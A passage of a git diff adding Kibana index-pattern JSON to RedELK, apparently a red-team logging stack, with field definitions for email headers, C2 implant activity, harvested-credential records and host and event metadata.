"readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-transport-crosstenantheadersstripped.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-transport-crosstenantheadersstripped" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-transport-endtoendlatency", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-transport-endtoendlatency.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-transport-endtoendlatency" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-transport-forked", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-transport-forked.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-transport-forked" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-has-attach", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-has-attach.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-has-attach" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-office365-filtering-correlation-id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-office365-filtering-correlation-id-prvs", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-office365-filtering-correlation-id-prvs.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-office365-filtering-correlation-id-prvs" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-office365-filtering-correlation-id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-office365-filtering-correlation-id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-oob-tlc-oobclassifiers", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-oob-tlc-oobclassifiers.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-oob-tlc-oobclassifiers" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-publictraffictype", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-publictraffictype.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-publictraffictype" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-tnef-correlator", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-tnef-correlator.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-tnef-correlator" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-traffictypediagnostic", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-traffictypediagnostic.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-traffictypediagnostic" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-userlastlogontime", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-userlastlogontime.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-userlastlogontime" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-msametadata", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-msametadata.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-msametadata" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-msapipeline", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-msapipeline.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-msapipeline" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-notifications", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-notifications.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-notifications" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-originating-ip", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-originating-ip.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-originating-ip" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-originatororg", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-originatororg.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-originatororg" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-received", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-received.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-received" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-sender-ip", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-sender-ip.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-sender-ip" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-sid-pra", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-sid-pra.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-sid-pra" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-sid-result", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-sid-result.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-sid-result" + } + }, + "type": "string" + } + ], + "timeFieldName": "@timestamp", + "title": "email-*" + }, + "coreMigrationVersion": "7.16.3", + "id": "email", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171860673, + 15 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json new file mode 100644 index 00000000..b8741e1c --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_implantsdb.json @@ -0,0 +1,1895 @@ +[ + { + "attributes": { + "fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "@version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.ephemeral_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.hostname", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "c2.log.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "c2.message", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "c2.program", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "c2.timestamp", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.credential", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.host", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.realm", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.source", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.username", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "ecs.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "error.message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.stack_trace", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "error.stack_trace.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "error.stack_trace" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "error.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.action", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.category", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.created", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.dataset", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "event.duration", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.end", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.ingested", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.kind", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.module", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.original", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.outcome", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.provider", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "event.risk_score", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "event.risk_score_norm", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "event.sequence", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "event.severity", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "event.start", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.timezone", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.url", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.directory", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.directory_local", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.md5", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.sha1", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.sha256", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.hash.sha512", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "file.path.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "file.path" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.path_local", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "file.path_local.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "file.path_local" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "file.size", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "file.url", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.architecture", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.domain_ext", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.as.organization.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "integer" + ], + "name": "host.geo.as.organization.number", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.city_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.continent_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.country_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.country_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "geo_point" + ], + "name": "host.geo.location", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "geo_point" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.region_iso_code", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.geo.region_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.hostname", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "host.ip", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "host.ip_ext", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "ip" + ], + "name": "host.ip_int", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "ip" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.mac", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.build", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.codename", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.family", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "host.os.full.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "host.os.full" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.kernel", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "host.os.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "host.os.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.platform", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.os.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "host.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.arch", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "implant.checkin", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "implant.input", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.link_mode", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "boolean" + ], + "name": "implant.linked", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "boolean" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.log_file", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "implant.output", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.parent_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.sleep", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.task", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "implant.url", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.attack_scenario", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.log_type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "input.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "ioc.type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.file.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.flags", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.level", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + 